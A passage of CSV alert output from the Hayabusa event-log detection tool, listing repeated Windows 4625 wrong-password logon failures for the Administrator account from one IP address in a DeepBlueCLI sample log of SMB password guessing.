NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
